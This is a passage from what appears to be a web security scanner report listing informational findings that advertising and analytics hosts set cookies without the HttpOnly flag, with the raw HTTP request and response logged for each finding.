Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 204 No Content
Content-Length: 0
Date: Tue, 26 Apr 2011 18:35:28 GMT
Connection: close
Set-Cookie: UID=25894b9d-24.143.206.177-1303083414; expires=Thu, 25-Apr-2013 18:35:28 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS


14.57. http://b.scorecardresearch.com/r  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /r

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r?c2=3000001&d.c=gif&d.o=msnportalauto&d.x=123478899&d.t=page&d.u=http%3A%2F%2Fhome.autos.msn.com%2Fdefault.aspx HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://home.autos.msn.com/default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 200 OK
Content-Length: 43
Content-Type: image/gif
Date: Tue, 26 Apr 2011 18:41:30 GMT
Connection: close
Set-Cookie: UID=25894b9d-24.143.206.177-1303083414; expires=Thu, 25-Apr-2013 18:41:30 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS

GIF89a.............!.......,...........D..;

14.58. http://b.voicefive.com/b  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.voicefive.com
Path:   /b

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b?c1=4&c2=p92429851&c3=296638382&c4=200925855&c5=1&c6=1&c7=Tue%20Apr%2026%2018%3A36%3A13%202011&c8=http%3A%2F%2Fview.atdmt.com%2FNYC%2Fiview%2F296638382%2Fdirect%3B%3Bwi.300%3Bhi.250%2F01%3Fclick%3D&c9=BND_Trapeze2011_FL_300x250_RV2_MSN_IFR.tpl&c10=&c15=&1303842985472 HTTP/1.1
Host: b.voicefive.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/NYC/iview/296638382/direct;;wi.300;hi.250/01?click=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p97174789=exp=24&initExp=Sun Apr 24 12:09:48 2011&recExp=Tue Apr 26 14:21:11 2011&prad=253732015&arc=178113848&; UID=875e3f1e-184.84.247.65-1303349046; ar_p92429851=exp=1&initExp=Tue Apr 26 18:36:13 2011&recExp=Tue Apr 26 18:36:13 2011&prad=296638382&arc=200925855&; BMX_G=method->-1,ts->1303842973; BMX_3PC=1

Response

HTTP/1.1 204 No Content
Content-Length: 0
Date: Tue, 26 Apr 2011 18:36:16 GMT
Connection: close
Set-Cookie: UID=875e3f1e-184.84.247.65-1303349046; expires=Thu, 25-Apr-2013 18:36:16 GMT; path=/; domain=.voicefive.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS


14.59. http://bh.contextweb.com/bh/set.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bh.contextweb.com
Path:   /bh/set.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bh/set.aspx?action=add&advid=2532&token=AMQU2 HTTP/1.1
Host: bh.contextweb.com
Proxy-Connection: keep-alive
Referer: http://www.widgetbox.com/mobile/builder/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pb_rtb_ev=1:535495.0c2aede6-6bb6-11e0-8fe6-0025900a8ffe.1|535039.9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC.0|535461.2931142961646634775.1; C2W4=3bZ_cGKSaikCutesUynzUXb59QbtOHa7Nv35a38qe_dW_2SdvoXWHsQ; pb_rtb_ev=1:535495.0c2aede6-6bb6-11e0-8fe6-0025900a8ffe.1|535039.9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC.0|536088.914804995789526.0|535461.2931142961646634775.1; V=wOebwAz4UvVv; cwbh1=541%3B05%2F24%2F2011%3BLIFL1%0A1697%3B05%2F24%2F2011%3BFCRT1%0A2354%3B05%2F24%2F2011%3BZETC1

Response

HTTP/1.1 200 OK
Server: Sun GlassFish Enterprise Server v2.1
CW-Server: cw-web83
Set-Cookie: V=wOebwAz4UvVv; Domain=.contextweb.com; Expires=Fri, 20-Apr-2012 21:46:55 GMT; Path=/
Set-Cookie: cwbh1=541%3B05%2F24%2F2011%3BLIFL1%0A1697%3B05%2F24%2F2011%3BFCRT1%0A2354%3B05%2F24%2F2011%3BZETC1%0A2532%3B05%2F26%2F2011%3BAMQU2; Domain=.contextweb.com; Expires=Wed, 30-Mar-2016 21:46:55 GMT; Path=/
Content-Type: image/gif
Date: Tue, 26 Apr 2011 21:46:55 GMT
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Content-Length: 49

GIF89a...................!.......,...........T..;

14.60. http://blog.widgetbox.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blog.widgetbox.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: blog.widgetbox.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=94870938.1303854385.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-2123435684-1303854386635; km_ai=ZEtF5LlpqXlV9eDTnhh0xLfL3xw; km_vs=1; km_lv=1303854422; km_uq=; __utma=94870938.1634222741.1303854385.1303854385.1303854385.1; __utmc=94870938; __utmb=94870938.6.10.1303854385

Response

HTTP/1.1 200 OK
Set-Cookie: JSESSIONID=6FF6422B75DF69D5F6D78A9CC3151614.web125; Path=/; HttpOnly
X-ServedBy: web125
Set-Cookie: ss_lastvisit=1303854731302; Expires=Fri, 23-Apr-2021 21:52:11 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 26 Apr 2011 21:52:10 GMT
Server: SSWS
Set-Cookie: BIGipServerWebServers=2097260736.20480.0000; path=/
Vary: Accept-Encoding, User-Agent
Connection: Keep-Alive
Content-Length: 44235

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

<head>
<meta http-
...[SNIP]...

14.61. http://bstats.adbrite.com/click/bstats.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bstats.adbrite.com
Path:   /click/bstats.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /click/bstats.gif?kid=48027945&bapid=11748&uid=560800 HTTP/1.1
Host: bstats.adbrite.com
Proxy-Connection: keep-alive
Referer: http://a.rfihub.com/ca.html?ra=8435996260.2377219032496214&rb=271&ca=1783&rc=10.2&rd=&ua=&ub=&uc=&ud=&ue=&pa=ppre843599625685&pb=&pc=&pd=&pg=&ct=1303843599626
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362049x0.049+1303083450x544669068"; rb=0:684339:20838240:4dab7d35-b1d2-915a-d3c0-9d57f9c66b07:0:742697:20828160:2931142961646634775:0:806205:20882880:0c2aede6-6bb6-11e0-8fe6-0025900a8ffe:0; rb2=CjQKBjY4NDMzORjljcu5CyIkNGRhYjdkMzUtYjFkMi05MTVhLWQzYzAtOWQ1N2Y5YzY2YjA3CjQKBjgwNjIwNRjAyYaZFSIkMGMyYWVkZTYtNmJiNi0xMWUwLThmZTYtMDAyNTkwMGE4ZmZlEAE; ut="1%3AHctBCoAgEAXQu%2Fy1m1GC8DZGBlFMOUaijncPevvX8Vr4jiPWcsma4ZGSa0UpzU5OtUqTyTYLKd11Y9agRE%2BDwRKYo%2Bz%2FwRgf"; cv="1%3Aq1ZyLi0uyc91zUtWslIyyU9OqknPLc9PsUitqDFNLbEyLLRITSm1MrayMC%2FPL1WqBQA%3D"; vsd=0@1@4db4c1a2@fls.doubleclick.net

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Cache-Control: no-cache, no-store, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Type: image/gif
Set-Cookie: srh="1%3Aq64FAA%3D%3D"; path=/; domain=.adbrite.com; expires=Wed, 27-Apr-2011 18:46:37 GMT
Set-Cookie: ut="1%3AHcxLCoAgEADQu8zaRaME4W2UDKJh8hOJOt29aPsWb8CtwQ44QqtnXgtYKLpkFIxtYxYniFdXKZleBdNiMokWnFWhQPSJZ4qCMoEC75hD3v8EnucF"; path=/; domain=.adbrite.com; expires=Fri, 23-Apr-2021 18:46:37 GMT
Set-Cookie: vsd=0@1@4db7130d@a.rfihub.com; path=/; domain=.adbrite.com; expires=Thu, 28-Apr-2011 18:46:37 GMT
Connection: close
Server: XPEHb/1.0
Accept-Ranges: none
Date: Tue, 26 Apr 2011 18:46:37 GMT
Content-Length: 42

GIF89a.............!.......,........@..D.;

14.62. http://c.atdmt.com/c.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://c.atdmt.com
Path:   /c.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /c.gif?jsv=3525&jsa=view&pi=7317&ps=95101&di=340&tp=http%3A%2F%2Fwww.msn.com%2Fdefaultwpe3w.aspx&lng=en-US&tz=-5&scr=1920x1200x16&rid=e163ec17625448e79673fc4fba538687&udc=true&rnd=1303842940067&RedC=c.msn.com&MXFR=B506C07761D7465D924574124E3C14DF HTTP/1.1
Host: c.atdmt.com
Proxy-Connection: keep-alive
Referer: http://www.msn.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1303072666-9018543; MUID=B506C07761D7465D924574124E3C14DF; ach00=903d/120af:fb75/120af; ach01=2a0cb15/120af/57ac7cf/903d/4db39163:b9e90a8/120af/f1fa4b0/fb75/4db416f0

Response

HTTP/1.1 302 Redirect
Cache-Control: private, no-cache, proxy-revalidate
Pragma: no-cache
Location: http://c.msn.com/c.gif?jsv=3525&jsa=view&pi=7317&ps=95101&di=340&tp=http%3A%2F%2Fwww.msn.com%2Fdefaultwpe3w.aspx&lng=en-US&tz=-5&scr=1920x1200x16&rid=e163ec17625448e79673fc4fba538687&udc=true&rnd=1303842940067&MUID=B506C07761D7465D924574124E3C14DF
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Set-Cookie: MUID=B506C07761D7465D924574124E3C14DF; domain=.atdmt.com; expires=Sat, 12-Nov-2011 18:35:33 GMT; path=/;
Date: Tue, 26 Apr 2011 18:35:33 GMT
Content-Length: 0


14.63. http://c.homestore.com/srv/oreo  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://c.homestore.com
Path:   /srv/oreo

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /srv/oreo?c.realtor.com HTTP/1.1
Host: c.homestore.com
Proxy-Connection: keep-alive
Referer: http://www.realtor.com/search/widgetportal/Widget.aspx?wname=MainSearchXSLContainer&app=8bcac8850c63428982ba6b6b90c09cfa&zip=75207
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Moved Temporarily
Date: Tue, 26 Apr 2011 18:46:19 GMT
Server: Apache/1.3.33 (Debian GNU/Linux) mod_jk/1.2.5
P3P: CP='COR CURa ADMo DEVo PSAo PSDo TAIo OUR'
Set-Cookie: HSID=561c652c36_R_63:10.160.4.250:369843579958:R; Domain=.homestore.com; Expires=Fri, 02-Jan-2043 20:32:59 GMT; Path=/
Location: http://c.realtor.com/srv/sugar?hsid=561c652c36_R_63:10.160.4.250:369843579958:R
Content-Length: 225
Cneonction: close
Content-Type: text/html; charset=ISO-8859-1

<html><head><title>Document moved</title></head>
<body><h1>Document moved</h1>
This document has moved <a href="http://c.realtor.com/srv/sugar?hsid=561c652c36_R_63:10.160.4.250:369843579958:R">here<
...[SNIP]...

14.64. http://c.live.com/c.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://c.live.com
Path:   /c.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /c.gif?DI=15501&wlxid=ea42cfe4-9b1a-4293-9276-b9fa57650771&reqid=0014ddf8c55&csiperf=nostart&r=0.7512656508479267 HTTP/1.1
Host: c.live.com
Proxy-Connection: keep-alive
Referer: http://explore.live.com/windows-live-messenger?os=other
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Sample=1; MUID=B506C07761D7465D924574124E3C14DF; wlidperf=throughput=13&latency=225; xid=ea42cfe4-9b1a-4293-9276-b9fa57650771&&TK2xxxxxxxxLP11&154; xidseq=1; mktstate=S=1623281324&U=&E=&P=&B=en-us; mkt1=norm=en-us; wlexpid=ea42cfe4-9b1a-4293-9276-b9fa57650771; wlv=A|_-d:s*s449Bg.2+1+0+3; E=P:aEefTVjSzYg=:GbI7jyce+ASXkK6Lz5dzEj3wxAVVXrTJiiazZaS199c=:F; wla42=; BP=VID=0.9254&VC=0&RC=1&LTT=1303843145271&l=WSC.Explore&FR=&ST=; LD=ea42cfe4-9b1a-4293-9276-b9fa57650771_0014ddf8c55_15501_1303843132949=L12308

Response

HTTP/1.1 302 Redirect
Cache-Control: private, no-cache, proxy-revalidate
Pragma: no-cache
Location: http://c.atdmt.com/c.gif?DI=15501&wlxid=ea42cfe4-9b1a-4293-9276-b9fa57650771&reqid=0014ddf8c55&csiperf=nostart&r=0.7512656508479267&RedC=c.live.com&MXFR=B506C07761D7465D924574124E3C14DF
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Set-Cookie: MUID=B506C07761D7465D924574124E3C14DF&TUID=1; domain=.live.com; expires=Sat, 12-Nov-2011 18:38:57 GMT; path=/;
Date: Tue, 26 Apr 2011 18:38:57 GMT
Content-Length: 0


14.65. http://c.msn.com/c.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://c.msn.com
Path:   /c.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /c.gif?jsv=3525&jsa=view&pi=7317&ps=95101&di=340&tp=http%3A%2F%2Fwww.msn.com%2Fdefaultwpe3w.aspx&lng=en-US&tz=-5&scr=1920x1200x16&rid=e163ec17625448e79673fc4fba538687&udc=true&rnd=1303842940067 HTTP/1.1
Host: c.msn.com
Proxy-Connection: keep-alive
Referer: http://www.msn.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=V=3&GUID=fdd1ad8ef8e24cf9bbad7ff7c197392d; mh=MSFT; CC=US; CULTURE=EN-US; MUID=B506C07761D7465D924574124E3C14DF; zip=z:75207|la:32.7825|lo:-96.8207|ci:Dallas|c:US; expid=id=79281a2784894bbe8e11de358b20f4da&bd=2011-04-23T14:00:24.831&v=2; Sample=37

Response

HTTP/1.1 302 Redirect
Cache-Control: private, no-cache, proxy-revalidate
Pragma: no-cache
Location: http://c.atdmt.com/c.gif?jsv=3525&jsa=view&pi=7317&ps=95101&di=340&tp=http%3A%2F%2Fwww.msn.com%2Fdefaultwpe3w.aspx&lng=en-US&tz=-5&scr=1920x1200x16&rid=e163ec17625448e79673fc4fba538687&udc=true&rnd=1303842940067&RedC=c.msn.com&MXFR=B506C07761D7465D924574124E3C14DF
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Set-Cookie: MUID=B506C07761D7465D924574124E3C14DF&TUID=1; domain=.msn.com; expires=Sat, 12-Nov-2011 18:35:31 GMT; path=/;
Date: Tue, 26 Apr 2011 18:35:30 GMT
Content-Length: 0


14.66. http://c.realtor.com/srv/sugar  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://c.realtor.com
Path:   /srv/sugar

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /srv/sugar?hsid=561c65cde6_R_a8:10.160.4.250:369843621350:R HTTP/1.1
Host: c.realtor.com
Proxy-Connection: keep-alive
Referer: http://www.realtor.com/search/widgetportal/Widget.aspx?wname=MainSearchXSLContainer&app=8bcac8850c63428982ba6b6b90c09cfa&zip=75207
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: criteria=sby=3&loc=75207&usrloc=75207&typ=3&status=1; recAlertSearch=recAlertShown=false&sameSrch=false&saveLstCnt=0&sid=; RecentSearch=loc%3dNew+York%2c+NY%26typ%3d3%26mnp%3d%26mxp%3d%26bd%3d0%26bth%3d0%26status%3d1

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 18:46:22 GMT
Server: Apache/1.3.33 (Debian GNU/Linux) mod_jk/1.2.5
P3P: CP='COR CURa ADMo DEVo PSAo PSDo TAIo OUR'
Set-Cookie: HSID=561c65cde6_R_a8:10.160.4.250:369843621350:R; Domain=.realtor.com; Expires=Fri, 02-Jan-2043 20:33:02 GMT; Path=/
nnCoection: close
Content-Type: image/gif
Content-Length: 43

GIF89a.............!.......,........@..D..;

14.67. http://c7.zedo.com/img/bh.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /img/bh.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /img/bh.gif?n=162&g=20&a=313&s=1&l=1&t=r HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.randomhouse.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDX=29; FFgeo=2241452; ZEDOIDA=5ajh4goBADQAAFjiiCYAAABN~042311; FFChanCap=1573B496,121#876543#543485#675101#544906#543481|1,1,1:0,1,1:14,1,1:0,1,1:0,1,1; ZCBC=1; ZFFAbh=845B826,20|1117_846#366Z798_845#365

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 88
Content-Type: image/gif
Set-Cookie: FFAbh=847B162,20|313_1#365;expires=Wed, 25 Apr 2012 22:05:53 GMT;domain=.zedo.com;path=/;
ETag: "85ecfbee-7054-49420a02cd680"
X-Varnish: 1708187920 1708184115
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=30394
Expires: Wed, 27 Apr 2011 06:32:27 GMT
Date: Tue, 26 Apr 2011 22:05:53 GMT
Connection: close

GIF89a.............!.......,...........D..;

GIF89a.............!.......,...........D..;

14.68. http://cbglobal.112.2o7.net/b/ss/cbglobal/1/H.20.3/s62270389322657  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cbglobal.112.2o7.net
Path:   /b/ss/cbglobal/1/H.20.3/s62270389322657

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/cbglobal/1/H.20.3/s62270389322657?AQB=1&ndh=1&t=26/3/2011%2013%3A40%3A59%202%20300&pageName=www.careerbuilder.com/iframe/recommendedcvupload.aspx&g=http%3A//www.careerbuilder.com/iframe/recommendedcvupload.aspx%3Fpagever%3DNewMSN&r=http%3A//msn.careerbuilder.com/msn/default.aspx&cc=USD&server=www&events=event18%2Cevent19&v11=NotRegistered&v15=NO_NotRegistered&c35=New&v35=New&c36=1&v36=1&c37=First%20Visit&v37=First%20Visit&c40=1%3A30PM&v40=1%3A30PM&c41=Tuesday&v41=Tuesday&c42=Weekday&v42=Weekday&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=290&bh=220&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: cbglobal.112.2o7.net
Proxy-Connection: keep-alive
Referer: http://www.careerbuilder.com/iframe/recommendedcvupload.aspx?pagever=NewMSN
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_kbuchzx7Ex60bodah=[CS]v4|26D5B4CB05010768-40000100203F0C39|4DAB6981[CE]; s_vi_efmdyx7Fx7Cdyx7Fc=[CS]v4|26D9C884851603AF-6000017820228B75|4DB39107[CE]; s_vi_kaquvg=[CS]v4|26D9C88705163068-600001A62005EACD|4DB3910D[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|26DA3EC40516221C-6000018240050B56|4DB47D87[CE]; s_vi_fx7Bhjeljfd=[CS]v4|26DA3EC40516221C-6000018240050B58|4DB47D87[CE]

Response

HTTP/1.1 302 Found
Date: Tue, 26 Apr 2011 18:41:02 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_kjodgjid=[CS]v4|0-0|4DB711BE[CE]; Expires=Sun, 24 Apr 2016 18:41:02 GMT; Domain=.2o7.net; Path=/
Location: http://cbglobal.112.2o7.net/b/ss/cbglobal/1/H.20.3/s62270389322657?AQB=1&pccr=true&&ndh=1&t=26/3/2011%2013%3A40%3A59%202%20300&pageName=www.careerbuilder.com/iframe/recommendedcvupload.aspx&g=http%3A//www.careerbuilder.com/iframe/recommendedcvupload.aspx%3Fpagever%3DNewMSN&r=http%3A//msn.careerbuilder.com/msn/default.aspx&cc=USD&server=www&events=event18%2Cevent19&v11=NotRegistered&v15=NO_NotRegistered&c35=New&v35=New&c36=1&v36=1&c37=First%20Visit&v37=First%20Visit&c40=1%3A30PM&v40=1%3A30PM&c41=Tuesday&v41=Tuesday&c42=Weekday&v42=Weekday&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=290&bh=220&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1
X-C: ms-4.4.1
Expires: Mon, 25 Apr 2011 18:41:02 GMT
Last-Modified: Wed, 27 Apr 2011 18:41:02 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www425
Content-Length: 0
Content-Type: text/plain


14.69. http://citi.bridgetrack.com/event/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://citi.bridgetrack.com
Path:   /event/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /event/?type=-1&BTData=C021772736C61775D5D494BBBB6A9B7AD9D93828FEBF8FEEDE6D5CCD9D96BC65CD&BT_PUB=961&BT_VEN=2515&BT_TRF=40877&r=[RANDOM] HTTP/1.1
Host: citi.bridgetrack.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/NYC/iview/296638382/direct;;wi.300;hi.250/01?click=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CitiBT=GUID=51F9B64F96004506A0AF0C3CC3A64C45

Response

HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Content-Length: 43
Content-Type: image/GIF
Expires: Mon, 25 Apr 2011 18:36:14 GMT
Server:
